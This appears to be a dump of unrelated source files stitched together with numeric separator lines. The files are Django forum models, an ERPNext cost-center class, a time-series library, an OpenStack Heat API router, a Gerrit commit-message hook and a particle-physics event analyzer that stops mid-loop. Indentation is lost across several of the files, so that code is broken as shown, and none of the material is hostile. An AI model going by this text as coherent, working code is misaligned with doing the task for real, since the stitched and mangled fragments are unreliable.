category = models.ForeignKey(Category, verbose_name=_("category"))
title = models.CharField(_("title"), max_length=255)
description = models.TextField(_("description"), default=_("No descriptions"), blank=True)
slug = AutoSlugField(populate_from="title", blank=True, unique=True)
date = models.DateTimeField(_("date"), default=timezone.now, blank=True, editable=False)
last_active = models.DateTimeField(_("last active"), default=timezone.now, blank=True, editable=False)
is_pinned = models.BooleanField(_("pinned"), default=False)
is_globally_pinned = models.BooleanField(_("globally pinned"), default=False, editable=False)
is_closed = models.BooleanField(_("closed"), default=False)
is_removed = models.BooleanField(default=False)
is_archived = models.BooleanField(default=False)
view_count = models.PositiveIntegerField(_("views count"), default=0, editable=False)
comment_count = models.PositiveIntegerField(_("comment count"), default=0, editable=False)
class Meta:
ordering = ['-last_active', '-pk']
verbose_name = _("topic")
verbose_name_plural = _("topics")
    def __unicode__(self):
        return self.title
def get_absolute_url(self):
return reverse('drf_spirit:topic-detail', kwargs={'pk': str(self.id), 'slug': self.slug})
@property
def main_category(self):
return self.category.parent or self.category
def increase_view_count(self):
Topic.objects.filter(pk=self.pk).update(view_count=F('view_count') + 1)
def increase_comment_count(self):
Topic.objects.filter(pk=self.pk).update(comment_count=F('comment_count') + 1, last_active=timezone.now())
def decrease_comment_count(self):
# todo: update last_active to last() comment
Topic.objects.filter(pk=self.pk).update(comment_count=F('comment_count') - 1)
class Comment(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='forum_comments', editable=False)
topic = models.ForeignKey(Topic, related_name='comments')
comment = models.TextField(_("comment"))
action = models.IntegerField(_("action"), choices=COMMENT_ACTION, default=COMMENT)
date = models.DateTimeField(default=timezone.now, blank=True, editable=False)
is_removed = models.BooleanField(default=False)
is_modified = models.BooleanField(default=False, editable=False)
ip_address = models.GenericIPAddressField(blank=True, null=True, editable=False)
modified_count = models.PositiveIntegerField(_("modified count"), default=0, editable=False)
likes_count = models.PositiveIntegerField(_("likes count"), default=0, editable=False)
class Meta:
ordering = ['-date', '-pk']
verbose_name = _("comment")
verbose_name_plural = _("comments")
    def __unicode__(self):
        return self.comment[:10]
def increase_modified_count(self):
Comment.objects.filter(pk=self.pk).update(modified_count=F('modified_count') + 1)
def increase_likes_count(self):
Comment.objects.filter(pk=self.pk).update(likes_count=F('likes_count') + 1)
def decrease_likes_count(self):
(Comment.objects.filter(pk=self.pk, likes_count__gt=0)
.update(likes_count=F('likes_count') - 1))
def save(self, *args, **kwargs):
# Comment has pk, means the comment is modified. So increase modified_count and change is_modified
if self.pk:
self.is_modified = True
self.modified_count = F('modified_count') + 1
super(Comment, self).save(*args, **kwargs)
if self.pk:
# comment has pk means modified_count is changed.
# As we use F expression, its not possible to know modified_count until refresh from db
self.refresh_from_db()
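# Illustrative edit flow for Comment.save() above (added; the pk is hypothetical):
#   c = Comment.objects.get(pk=1)
#   c.comment = 'edited'
#   c.save()  # sets is_modified=True, issues modified_count = modified_count + 1
#             # in SQL, then refresh_from_db() reloads the concrete counter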
| 0.004265 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import cint, cstr
from frappe.utils.nestedset import NestedSet
class CostCenter(NestedSet):
nsm_parent_field = 'parent_cost_center'
def autoname(self):
self.name = self.cost_center_name.strip() + ' - ' + \
frappe.db.get_value("Company", self.company, "abbr")
def validate(self):
self.validate_mandatory()
def validate_mandatory(self):
if self.cost_center_name != self.company and not self.parent_cost_center:
frappe.throw(_("Please enter parent cost center"))
elif self.cost_center_name == self.company and self.parent_cost_center:
frappe.throw(_("Root cannot have a parent cost center"))
def convert_group_to_ledger(self):
if self.check_if_child_exists():
frappe.throw(_("Cannot convert Cost Center to ledger as it has child nodes"))
elif self.check_gle_exists():
frappe.throw(_("Cost Center with existing transactions can not be converted to ledger"))
else:
self.is_group = 0
self.save()
return 1
def convert_ledger_to_group(self):
if self.check_gle_exists():
frappe.throw(_("Cost Center with existing transactions can not be converted to group"))
else:
self.is_group = 1
self.save()
return 1
def check_gle_exists(self):
return frappe.db.get_value("GL Entry", {"cost_center": self.name})
def check_if_child_exists(self):
return frappe.db.sql("select name from `tabCost Center` where \
parent_cost_center = %s and docstatus != 2", self.name)
def before_rename(self, olddn, newdn, merge=False):
# Add company abbr if not provided
from erpnext.setup.doctype.company.company import get_name_with_abbr
new_cost_center = get_name_with_abbr(newdn, self.company)
# Validate properties before merging
super(CostCenter, self).before_rename(olddn, new_cost_center, merge, "is_group")
return new_cost_center
def after_rename(self, olddn, newdn, merge=False):
super(CostCenter, self).after_rename(olddn, newdn, merge)
if not merge:
new_cost_center = frappe.db.get_value("Cost Center", newdn, ["cost_center_name", "cost_center_number"], as_dict=1)
# exclude company abbr
new_parts = newdn.split(" - ")[:-1]
# update cost center number and remove from parts
if new_parts[0][0].isdigit():
if len(new_parts) == 1:
new_parts = newdn.split(" ")
if new_cost_center.cost_center_number != new_parts[0]:
validate_field_number("Cost Center", self.name, new_parts[0], self.company, "cost_center_number")
self.cost_center_number = new_parts[0]
self.db_set("cost_center_number", new_parts[0])
new_parts = new_parts[1:]
# update cost center name
cost_center_name = " - ".join(new_parts)
if new_cost_center.cost_center_name != cost_center_name:
self.cost_center_name = cost_center_name
self.db_set("cost_center_name", cost_center_name)
def on_doctype_update():
frappe.db.add_index("Cost Center", ["lft", "rgt"])
def get_doc_name_autoname(field_value, doc_title, name, company):
if company:
name_split=name.split("-")
parts = [doc_title.strip(), name_split[len(name_split)-1].strip()]
else:
parts = [doc_title.strip()]
if cstr(field_value).strip():
parts.insert(0, cstr(field_value).strip())
return ' - '.join(parts)
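# Example outputs of get_doc_name_autoname (added; inputs are hypothetical):
#   get_doc_name_autoname('110', 'Marketing', 'Marketing - WP', 'Wind Power')
#   # -> '110 - Marketing - WP'
#   get_doc_name_autoname('', 'Marketing', 'Marketing', None)
#   # -> 'Marketing'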
def validate_field_number(doctype_name, name, field_value, company, field_name):
if field_value:
if company:
doctype_with_same_number = frappe.db.get_value(doctype_name,
{field_name: field_value, "company": company, "name": ["!=", name]})
else:
doctype_with_same_number = frappe.db.get_value(doctype_name,
{field_name: field_value, "name": ["!=", name]})
if doctype_with_same_number:
frappe.throw(_("{0} Number {1} already used in account {2}")
.format(doctype_name, field_value, doctype_with_same_number))
@frappe.whitelist()
def update_number_field(doctype_name, name, field_name, field_value, company):
doc_title = frappe.db.get_value(doctype_name, name, frappe.scrub(doctype_name)+"_name")
validate_field_number(doctype_name, name, field_value, company, field_name)
frappe.db.set_value(doctype_name, name, field_name, field_value)
if doc_title[0].isdigit():
separator = " - " if " - " in doc_title else " "
doc_title = doc_title.split(separator, 1)[1]
frappe.db.set_value(doctype_name, name, frappe.scrub(doctype_name)+"_name", doc_title)
new_name = get_doc_name_autoname(field_value, doc_title, name, company)
if name != new_name:
frappe.rename_doc(doctype_name, name, new_name)
    return new_name
| 0.024096 |
#!/usr/bin/env python3
import numpy as np
import math
import numbers
import datetime
import sys
from .helpers import *
from .interfaces import *
class TimeSeries(SizedContainerTimeSeriesInterface):
def __init__(self, time_points, data_points):
'''Implements the SizedContainerTimeSeriesInterface using Python lists for storage.
Args:
`time_points` (sequence): A sequence of time points. Must have length equal to `data_points.`
`data_points` (sequence): A sequence of data points. Must have length equal to `time_points.`
Returns:
TimeSeries: A time series containing time and data points.'''
super().__init__(time_points, data_points)
self._times = list(time_points)
self._data = list(data_points)
def __len__(self):
'''The length of the time series.
Returns:
int: The number of elements in the time series.'''
return len(self._times)
def __iter__(self):
'''An iterable over the data points of the time series.
Returns:
iterable: An iterable over the data points of the time series.'''
return iter(self._data)
def itertimes(self):
'''Returns an iterator over the TimeSeries times'''
return iter(self._times)
    def __sizeof__(self):
        '''Returns the size in bytes of the time series storage.'''
        # Use the actual storage attributes, matching ArrayTimeSeries below.
        return sys.getsizeof(self._times) + sys.getsizeof(self._data)
class ArrayTimeSeries(TimeSeries):
def __init__(self, time_points, data_points):
'''Implements the SizedContainerTimeSeriesInterface using NumPy arrays for storage.
Args:
`time_points` (sequence): A sequence of time points. Must have length equal to `data_points.`
`data_points` (sequence): A sequence of data points. Must have length equal to `time_points.`
Returns:
ArrayTimeSeries: A time series containing time and data points.'''
super().__init__(time_points, data_points)
self._length = len(time_points)
self._times = np.empty(self._length * 2)
self._data = np.empty(self._length * 2)
self._times[:self._length] = time_points
self._data[:self._length] = data_points
def __len__(self):
return self._length
def __getitem__(self, key):
'''Returns the data point from the TimeSeries with index = key'''
if key >= self._length:
raise IndexError('ArrayTimeSeries index out of range.')
return self._data[key]
def __setitem__(self, key, value):
'''Sets the data point from the TimeSeries with index = key to value'''
if key >= self._length:
raise IndexError('ArrayTimeSeries index out of range.')
self._data[key] = value
def __iter__(self):
return iter(self._data[:self._length])
def itertimes(self):
'''Returns an iterator over the time indices for the ArrayTimeSeries.'''
return iter(self._times[:self._length])
def iteritems(self):
'''Returns an iterator over the tuples (time, value) for each item in the ArrayTimeSeries.'''
return iter(zip(self._times[:self._length], self._data[:self._length]))
def __sizeof__(self):
'''Returns the size in bytes of the time series storage.'''
return sys.getsizeof(self._times) + sys.getsizeof(self._data)
class SimulatedTimeSeries(StreamTimeSeriesInterface):
'''A time series with no internal storage.
Yields data from a supplied generator, either with or without times provided.'''
def __init__(self, generator):
'''Inits SimulatedTimeSeries with a value or (time,value) generator'''
        try:
            self._gen = iter(generator)
            self._index = 0
        except TypeError:
            raise TypeError('Parameter `generator` must be a sequence type.')
def __iter__(self):
'''Returns an iterator that gets a new value from produce'''
return self
def __next__(self):
'''An iterator that gets a new data point from produce'''
return self.produce()[0][1]
def iteritems(self):
'''An iterator that gets a new (time,value) tuple from produce'''
while True:
yield self.produce()[0]
def itertimes(self):
'''An iterator that gets a new time from produce'''
while True:
yield self.produce()[0][0]
def __repr__(self):
format_str = '{}([{}])'
class_name = type(self).__name__
return format_str.format(class_name, str(self._gen))
def produce(self, chunk = 1):
'''Generates a list of up to chunk (time, value) tuples. If optional time is not
provided, adds an integer timestamp (Unix time) to value
Args:
chunk (int): the number of tuples produce generates
Returns:
list: list of (time, value) tuples.'''
values = []
for i in range(chunk):
value = next(self._gen)
            if isinstance(value, tuple):
values.append(value)
else:
values.append((int(datetime.datetime.now().timestamp()), value))
return values
def online_std(self, chunk=1)->StreamTimeSeriesInterface:
"Online standard deviation"
def gen():
n = 0
mu = 0
dev_accum = 0
for i in range(chunk):
tmp = next(self._gen)
(time, value) = (tmp[0], tmp[1])
n += 1
delta = value - mu
dev_accum=dev_accum+(value-mu)*(value-mu-delta/n)
mu = mu + delta/n
if n==1:
stddev = 0
yield (time, stddev)
elif n > 1:
stddev = math.sqrt(dev_accum/(n-1))
yield (time, stddev)
return SimulatedTimeSeries(gen())
def online_mean(self, chunk=1)->StreamTimeSeriesInterface:
"Online mean"
def gen():
n = 0
mu = 0
for i in range(chunk):
tmp = next(self._gen)
(time, value) = (tmp[0], tmp[1])
n += 1
delta = value - mu
mu = mu + delta/n
yield (time, mu)
return SimulatedTimeSeries(gen())
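# Hypothetical usage of online_mean (added):
#   gen = ((t, float(t)) for t in range(5))
#   means = SimulatedTimeSeries(gen).online_mean(chunk=5)
#   list(means)  # -> [0.0, 0.5, 1.0, 1.5, 2.0]
#   # (values only; produce() yields the underlying (time, mean) tuples)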
| 0.0039 |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import routes
import six
from heat.api.openstack.v1 import actions
from heat.api.openstack.v1 import build_info
from heat.api.openstack.v1 import events
from heat.api.openstack.v1 import resources
from heat.api.openstack.v1 import services
from heat.api.openstack.v1 import software_configs
from heat.api.openstack.v1 import software_deployments
from heat.api.openstack.v1 import stacks
from heat.common import wsgi
class API(wsgi.Router):
"""WSGI router for Heat v1 REST API requests."""
def __init__(self, conf, **local_conf):
self.conf = conf
mapper = routes.Mapper()
default_resource = wsgi.Resource(wsgi.DefaultMethodController(),
wsgi.JSONRequestDeserializer())
def connect(controller, path_prefix, routes):
"""Connects list of routes to given controller with path_prefix.
This function connects the list of routes to the given
controller, prepending the given path_prefix. Then for each URL it
finds which request methods aren't handled and configures those
to return a 405 error. Finally, it adds a handler for the
OPTIONS method to all URLs that returns the list of allowed
methods with 204 status code.
"""
# register the routes with the mapper, while keeping track of which
# methods are defined for each URL
urls = {}
for r in routes:
url = path_prefix + r['url']
methods = r['method']
if isinstance(methods, six.string_types):
methods = [methods]
methods_str = ','.join(methods)
mapper.connect(r['name'], url, controller=controller,
action=r['action'],
conditions={'method': methods_str})
if url not in urls:
urls[url] = methods
else:
urls[url] += methods
# now register the missing methods to return 405s, and register
# a handler for OPTIONS that returns the list of allowed methods
for url, methods in urls.items():
all_methods = ['HEAD', 'GET', 'POST', 'PUT', 'PATCH', 'DELETE']
missing_methods = [m for m in all_methods if m not in methods]
allowed_methods_str = ','.join(methods)
mapper.connect(url,
controller=default_resource,
action='reject',
allowed_methods=allowed_methods_str,
conditions={'method': missing_methods})
if 'OPTIONS' not in methods:
mapper.connect(url,
controller=default_resource,
action='options',
allowed_methods=allowed_methods_str,
conditions={'method': 'OPTIONS'})
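        # Net effect of connect() (added; the URL is hypothetical): if '/x' is
        # registered only for GET, then POST /x is answered with 405 and
        # Allow: GET, while OPTIONS /x returns 204 with the allowed methods.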
# Stacks
stacks_resource = stacks.create_resource(conf)
connect(controller=stacks_resource,
path_prefix='/{tenant_id}',
routes=[
# Template handling
{
'name': 'template_validate',
'url': '/validate',
'action': 'validate_template',
'method': 'POST'
},
{
'name': 'resource_types',
'url': '/resource_types',
'action': 'list_resource_types',
'method': 'GET'
},
{
'name': 'resource_schema',
'url': '/resource_types/{type_name}',
'action': 'resource_schema',
'method': 'GET'
},
{
'name': 'generate_template',
'url': '/resource_types/{type_name}/template',
'action': 'generate_template',
'method': 'GET'
},
{
'name': 'template_versions',
'url': '/template_versions',
'action': 'list_template_versions',
'method': 'GET'
},
{
'name': 'template_functions',
'url': '/template_versions/{template_version}'
'/functions',
'action': 'list_template_functions',
'method': 'GET'
},
# Stack collection
{
'name': 'stack_index',
'url': '/stacks',
'action': 'index',
'method': 'GET'
},
{
'name': 'stack_create',
'url': '/stacks',
'action': 'create',
'method': 'POST'
},
{
'name': 'stack_preview',
'url': '/stacks/preview',
'action': 'preview',
'method': 'POST'
},
{
'name': 'stack_detail',
'url': '/stacks/detail',
'action': 'detail',
'method': 'GET'
},
# Stack data
{
'name': 'stack_lookup',
'url': '/stacks/{stack_name}',
'action': 'lookup',
'method': ['GET', 'POST', 'PUT', 'PATCH', 'DELETE']
},
# \x3A matches on a colon.
# Routes treats : specially in its regexp
{
'name': 'stack_lookup',
'url': r'/stacks/{stack_name:arn\x3A.*}',
'action': 'lookup',
'method': ['GET', 'POST', 'PUT', 'PATCH', 'DELETE']
},
{
'name': 'stack_lookup_subpath',
'url': '/stacks/{stack_name}/'
'{path:resources|events|template|actions'
'|environment|files}',
'action': 'lookup',
'method': 'GET'
},
{
'name': 'stack_lookup_subpath_post',
'url': '/stacks/{stack_name}/'
'{path:resources|events|template|actions}',
'action': 'lookup',
'method': 'POST'
},
{
'name': 'stack_show',
'url': '/stacks/{stack_name}/{stack_id}',
'action': 'show',
'method': 'GET'
},
{
'name': 'stack_lookup',
'url': '/stacks/{stack_name}/{stack_id}/template',
'action': 'template',
'method': 'GET'
},
{
'name': 'stack_lookup',
'url': '/stacks/{stack_name}/{stack_id}/environment',
'action': 'environment',
'method': 'GET'
},
{
'name': 'stack_lookup',
'url': '/stacks/{stack_name}/{stack_id}/files',
'action': 'files',
'method': 'GET'
},
# Stack update/delete
{
'name': 'stack_update',
'url': '/stacks/{stack_name}/{stack_id}',
'action': 'update',
'method': 'PUT'
},
{
'name': 'stack_update_patch',
'url': '/stacks/{stack_name}/{stack_id}',
'action': 'update_patch',
'method': 'PATCH'
},
{
'name': 'preview_stack_update',
'url': '/stacks/{stack_name}/{stack_id}/preview',
'action': 'preview_update',
'method': 'PUT'
},
{
'name': 'preview_stack_update_patch',
'url': '/stacks/{stack_name}/{stack_id}/preview',
'action': 'preview_update_patch',
'method': 'PATCH'
},
{
'name': 'stack_delete',
'url': '/stacks/{stack_name}/{stack_id}',
'action': 'delete',
'method': 'DELETE'
},
# Stack abandon
{
'name': 'stack_abandon',
'url': '/stacks/{stack_name}/{stack_id}/abandon',
'action': 'abandon',
'method': 'DELETE'
},
{
'name': 'stack_export',
'url': '/stacks/{stack_name}/{stack_id}/export',
'action': 'export',
'method': 'GET'
},
{
'name': 'stack_snapshot',
'url': '/stacks/{stack_name}/{stack_id}/snapshots',
'action': 'snapshot',
'method': 'POST'
},
{
'name': 'stack_snapshot_show',
'url': '/stacks/{stack_name}/{stack_id}/snapshots/'
'{snapshot_id}',
'action': 'show_snapshot',
'method': 'GET'
},
{
'name': 'stack_snapshot_delete',
'url': '/stacks/{stack_name}/{stack_id}/snapshots/'
'{snapshot_id}',
'action': 'delete_snapshot',
'method': 'DELETE'
},
{
'name': 'stack_list_snapshots',
'url': '/stacks/{stack_name}/{stack_id}/snapshots',
'action': 'list_snapshots',
'method': 'GET'
},
{
'name': 'stack_snapshot_restore',
'url': '/stacks/{stack_name}/{stack_id}/snapshots/'
'{snapshot_id}/restore',
'action': 'restore_snapshot',
'method': 'POST'
},
# Stack outputs
{
'name': 'stack_output_list',
'url': '/stacks/{stack_name}/{stack_id}/outputs',
'action': 'list_outputs',
'method': 'GET'
},
{
'name': 'stack_output_show',
'url': '/stacks/{stack_name}/{stack_id}/outputs/'
'{output_key}',
'action': 'show_output',
'method': 'GET'
}
])
# Resources
resources_resource = resources.create_resource(conf)
stack_path = '/{tenant_id}/stacks/{stack_name}/{stack_id}'
connect(controller=resources_resource, path_prefix=stack_path,
routes=[
# Resource collection
{
'name': 'resource_index',
'url': '/resources',
'action': 'index',
'method': 'GET'
},
# Resource data
{
'name': 'resource_show',
'url': '/resources/{resource_name}',
'action': 'show',
'method': 'GET'
},
{
'name': 'resource_metadata_show',
'url': '/resources/{resource_name}/metadata',
'action': 'metadata',
'method': 'GET'
},
{
'name': 'resource_signal',
'url': '/resources/{resource_name}/signal',
'action': 'signal',
'method': 'POST'
},
{
'name': 'resource_mark_unhealthy',
'url': '/resources/{resource_name}',
'action': 'mark_unhealthy',
'method': 'PATCH'
}
])
# Events
events_resource = events.create_resource(conf)
connect(controller=events_resource, path_prefix=stack_path,
routes=[
# Stack event collection
{
'name': 'event_index_stack',
'url': '/events',
'action': 'index',
'method': 'GET'
},
# Resource event collection
{
'name': 'event_index_resource',
'url': '/resources/{resource_name}/events',
'action': 'index',
'method': 'GET'
},
# Event data
{
'name': 'event_show',
'url': '/resources/{resource_name}/events/{event_id}',
'action': 'show',
'method': 'GET'
}
])
# Actions
actions_resource = actions.create_resource(conf)
connect(controller=actions_resource, path_prefix=stack_path,
routes=[
{
'name': 'action_stack',
'url': '/actions',
'action': 'action',
'method': 'POST'
}
])
# Info
info_resource = build_info.create_resource(conf)
connect(controller=info_resource, path_prefix='/{tenant_id}',
routes=[
{
'name': 'build_info',
'url': '/build_info',
'action': 'build_info',
'method': 'GET'
}
])
# Software configs
software_config_resource = software_configs.create_resource(conf)
connect(controller=software_config_resource,
path_prefix='/{tenant_id}/software_configs',
routes=[
{
'name': 'software_config_index',
'url': '',
'action': 'index',
'method': 'GET'
},
{
'name': 'software_config_create',
'url': '',
'action': 'create',
'method': 'POST'
},
{
'name': 'software_config_show',
'url': '/{config_id}',
'action': 'show',
'method': 'GET'
},
{
'name': 'software_config_delete',
'url': '/{config_id}',
'action': 'delete',
'method': 'DELETE'
}
])
# Software deployments
sd_resource = software_deployments.create_resource(conf)
connect(controller=sd_resource,
path_prefix='/{tenant_id}/software_deployments',
routes=[
{
'name': 'software_deployment_index',
'url': '',
'action': 'index',
'method': 'GET'
},
{
'name': 'software_deployment_metadata',
'url': '/metadata/{server_id}',
'action': 'metadata',
'method': 'GET'
},
{
'name': 'software_deployment_create',
'url': '',
'action': 'create',
'method': 'POST'
},
{
'name': 'software_deployment_show',
'url': '/{deployment_id}',
'action': 'show',
'method': 'GET'
},
{
'name': 'software_deployment_update',
'url': '/{deployment_id}',
'action': 'update',
'method': 'PUT'
},
{
'name': 'software_deployment_delete',
'url': '/{deployment_id}',
'action': 'delete',
'method': 'DELETE'
}
])
# Services
service_resource = services.create_resource(conf)
with mapper.submapper(
controller=service_resource,
path_prefix='/{tenant_id}/services'
) as sa_mapper:
sa_mapper.connect("service_index",
"",
action="index",
conditions={'method': 'GET'})
# now that all the routes are defined, initialize the base Router with the mapper
super(API, self).__init__(mapper)
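# For reference, a minimal sketch of what the `connect` helper used above
# might look like, assuming the Routes library's Mapper API and that `connect`
# closes over the surrounding `mapper`; illustrative only, not the actual
# Heat implementation:
#
#     def connect(controller, path_prefix, routes):
#         # Register every route dict on the mapper under a common prefix.
#         for r in routes:
#             mapper.connect(r['name'], path_prefix + r['url'],
#                            controller=controller, action=r['action'],
#                            conditions={'method': [r['method']]})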
#!/usr/bin/env python
from __future__ import print_function
import subprocess
import getopt
import sys
SSH_USER = 'bot'
SSH_HOST = 'localhost'
SSH_PORT = 29418
SSH_COMMAND = 'ssh %s@%s -p %d gerrit approve ' % (SSH_USER, SSH_HOST, SSH_PORT)
FAILURE_SCORE = '--code-review=-2'
FAILURE_MESSAGE = 'This commit message does not match the standard.' \
+ ' Please correct the commit message and upload a replacement patch.'
PASS_SCORE = '--code-review=0'
PASS_MESSAGE = ''
def main():
change = None
project = None
branch = None
commit = None
patchset = None
try:
opts, _args = getopt.getopt(sys.argv[1:], '', \
['change=', 'project=', 'branch=', 'commit=', 'patchset='])
except getopt.GetoptError as err:
print('Error: %s' % (err))
usage()
sys.exit(-1)
for arg, value in opts:
if arg == '--change':
change = value
elif arg == '--project':
project = value
elif arg == '--branch':
branch = value
elif arg == '--commit':
commit = value
elif arg == '--patchset':
patchset = value
else:
print('Error: option %s not recognized' % (arg))
usage()
sys.exit(-1)
if change is None or project is None or branch is None \
or commit is None or patchset is None:
usage()
sys.exit(-1)
command = 'git cat-file commit %s' % (commit)
status, output = subprocess.getstatusoutput(command)
if status != 0:
print('Error running \'%s\'. status: %s, output:\n\n%s' % \
(command, status, output))
sys.exit(-1)
commitMessage = output[(output.find('\n\n')+2):]
commitLines = commitMessage.split('\n')
if len(commitLines) > 1 and len(commitLines[1]) != 0:
fail(commit, 'Invalid commit summary. The summary must be ' \
+ 'one line followed by a blank line.')
for i, line in enumerate(commitLines, 1):
    if len(line) > 80:
        fail(commit, 'Line %d is over 80 characters.' % i)
passes(commit)
def usage():
print('Usage:\n')
print(sys.argv[0] + ' --change <change id> --project <project name> ' \
+ '--branch <branch> --commit <sha1> --patchset <patchset id>')
def fail(commit, message):
command = SSH_COMMAND + FAILURE_SCORE + ' -m \\\"' \
+ _shell_escape( FAILURE_MESSAGE + '\n\n' + message) \
+ '\\\" ' + commit
subprocess.getstatusoutput(command)
sys.exit(1)
def passes(commit):
command = SSH_COMMAND + PASS_SCORE + ' -m \\\"' \
+ _shell_escape(PASS_MESSAGE) + ' \\\" ' + commit
subprocess.getstatusoutput(command)
def _shell_escape(x):
s = ''
for c in x:
if c == '\n':
s = s + '\\\"$\'\\n\'\\\"'
else:
s = s + c
return s
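def _shell_quote(message):
    # Hypothetical sturdier alternative to _shell_escape above: shlex.quote
    # (Python 3) covers quotes, spaces and newlines in one step. Not used by
    # the hook itself; shown for comparison only.
    import shlex
    return shlex.quote(message)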
if __name__ == '__main__':
main()
#!/usr/bin/env python
"""
Analyzer of B0s -> K*0 Ds+ Ds- events
                    |    |   |-> pi- pi- pi+ K0L
                    |    |-> pi+ pi+ pi- K0L
                    |-> K+ pi-
Note: it is supposed to be used within heppy_fcc framework
"""
import math
import time
import numpy
from heppy_fcc.utility.CommonAnalyzer import CommonAnalyzer
from heppy_fcc.utility.Particle import Particle
class BackgroundBs2DsDsKWithDs2PiPiPiKAnalyzer(CommonAnalyzer):
"""
Analyzer of B0s -> K*0 Ds+ Ds- background events
                    |    |   |-> pi- pi- pi+ K0L
                    |    |-> pi+ pi+ pi- K0L
                    |-> K+ pi-
Inherits from heppy_fcc.utility.CommonAnalyzer. Extends the base class to cover analysis-specific needs
"""
def __init__(self, cfg_ana, cfg_comp, looper_name):
"""
Constructor
Arguments:
cfg_ana: passed to the base class
cfg_comp: passed to the base class
looper_name: passed to the base class
"""
super(BackgroundBs2DsDsKWithDs2PiPiPiKAnalyzer, self).__init__(cfg_ana, cfg_comp, looper_name)
# MC truth values
self.mc_truth_tree.var('n_particles')
self.mc_truth_tree.var('event_number')
self.mc_truth_tree.var('pv_x')
self.mc_truth_tree.var('pv_y')
self.mc_truth_tree.var('pv_z')
self.mc_truth_tree.var('sv_x')
self.mc_truth_tree.var('sv_y')
self.mc_truth_tree.var('sv_z')
self.mc_truth_tree.var('tv_dplus_x')
self.mc_truth_tree.var('tv_dplus_y')
self.mc_truth_tree.var('tv_dplus_z')
self.mc_truth_tree.var('tv_dminus_x')
self.mc_truth_tree.var('tv_dminus_y')
self.mc_truth_tree.var('tv_dminus_z')
self.mc_truth_tree.var('b_px')
self.mc_truth_tree.var('b_py')
self.mc_truth_tree.var('b_pz')
self.mc_truth_tree.var('kstar_px')
self.mc_truth_tree.var('kstar_py')
self.mc_truth_tree.var('kstar_pz')
self.mc_truth_tree.var('k_px')
self.mc_truth_tree.var('k_py')
self.mc_truth_tree.var('k_pz')
self.mc_truth_tree.var('k_q')
self.mc_truth_tree.var('pi_kstar_px')
self.mc_truth_tree.var('pi_kstar_py')
self.mc_truth_tree.var('pi_kstar_pz')
self.mc_truth_tree.var('pi_kstar_q')
self.mc_truth_tree.var('dplus_px')
self.mc_truth_tree.var('dplus_py')
self.mc_truth_tree.var('dplus_pz')
self.mc_truth_tree.var('pi1_dplus_px')
self.mc_truth_tree.var('pi1_dplus_py')
self.mc_truth_tree.var('pi1_dplus_pz')
self.mc_truth_tree.var('pi1_dplus_q')
self.mc_truth_tree.var('pi2_dplus_px')
self.mc_truth_tree.var('pi2_dplus_py')
self.mc_truth_tree.var('pi2_dplus_pz')
self.mc_truth_tree.var('pi2_dplus_q')
self.mc_truth_tree.var('pi3_dplus_px')
self.mc_truth_tree.var('pi3_dplus_py')
self.mc_truth_tree.var('pi3_dplus_pz')
self.mc_truth_tree.var('pi3_dplus_q')
self.mc_truth_tree.var('k0_dplus_px')
self.mc_truth_tree.var('k0_dplus_py')
self.mc_truth_tree.var('k0_dplus_pz')
self.mc_truth_tree.var('dminus_px')
self.mc_truth_tree.var('dminus_py')
self.mc_truth_tree.var('dminus_pz')
self.mc_truth_tree.var('pi1_dminus_px')
self.mc_truth_tree.var('pi1_dminus_py')
self.mc_truth_tree.var('pi1_dminus_pz')
self.mc_truth_tree.var('pi1_dminus_q')
self.mc_truth_tree.var('pi2_dminus_px')
self.mc_truth_tree.var('pi2_dminus_py')
self.mc_truth_tree.var('pi2_dminus_pz')
self.mc_truth_tree.var('pi2_dminus_q')
self.mc_truth_tree.var('pi3_dminus_px')
self.mc_truth_tree.var('pi3_dminus_py')
self.mc_truth_tree.var('pi3_dminus_pz')
self.mc_truth_tree.var('pi3_dminus_q')
self.mc_truth_tree.var('k0_dminus_px')
self.mc_truth_tree.var('k0_dminus_py')
self.mc_truth_tree.var('k0_dminus_pz')
def process(self, event):
"""
Overridden base class function
Processes the event
Arguments:
event: the event being processed
"""
b = None # B particle
kstar = None # K* from B decay
k = None # K from K* decay
pi_kstar = None # pi from K* decay
dplus = None  # Ds+ from Bs decay
dminus = None # Ds- from Bs decay
pi1_dplus = None # pi from Ds+ decay
pi2_dplus = None # pi from Ds+ decay
pi3_dplus = None # pi from Ds+ decay
k0_dplus = None  # K0L from Ds+ decay
pi1_dminus = None # pi from Ds- decay
pi2_dminus = None # pi from Ds- decay
pi3_dminus = None # pi from Ds- decay
k0_dminus = None  # K0L from Ds- decay
pv = None # primary vertex
sv = None # secondary vertex
tv_dplus = None  # Ds+ decay vertex
tv_dminus = None  # Ds- decay vertex
pvsv_distance = 0. # distance between PV and SV
pb = 0. # B momentum
max_svtv_distance = 0. # maximal distance between SV and TV
event_info = event.input.get("EventInfo")
particles_info = event.input.get("GenParticle")
event_number = event_info.at(0).Number()
ptcs = list(map(Particle.fromfccptc, particles_info))
n_particles = len(ptcs)
# looking for B
for ptc_gen1 in ptcs:
if abs(ptc_gen1.pdgid) == 531 and ptc_gen1.start_vertex != ptc_gen1.end_vertex: # if B0s found and it's not an oscillation
self.counter += 1
if self.counter % 100 == 0:
print('Processing decay #{} ({:.1f} decays / s)'.format(self.counter, 100. / (time.time() - self.last_timestamp)))
self.last_timestamp = time.time()
b = ptc_gen1
pb = b.p.absvalue()
if pb > 25.: # Select only events with large momentum of the B
self.pb_counter += 1
pv = b.start_vertex
sv = b.end_vertex
pvsv_distance = math.sqrt((sv.x - pv.x) ** 2 + (sv.y - pv.y) ** 2 + (sv.z - pv.z) ** 2)
if pvsv_distance > 1.: # Select only events with long flight distance of the B
self.pvsv_distance_counter += 1
for ptc_gen2 in ptcs:
if ptc_gen2.start_vertex == b.end_vertex:
# looking for Ds+
if ptc_gen2.pdgid == 431:
dplus = ptc_gen2
tv_dplus = dplus.end_vertex
# looking for Ds-
if ptc_gen2.pdgid == -431:
dminus = ptc_gen2
tv_dminus = dminus.end_vertex
# looking for K*
if abs(ptc_gen2.pdgid) == 313:
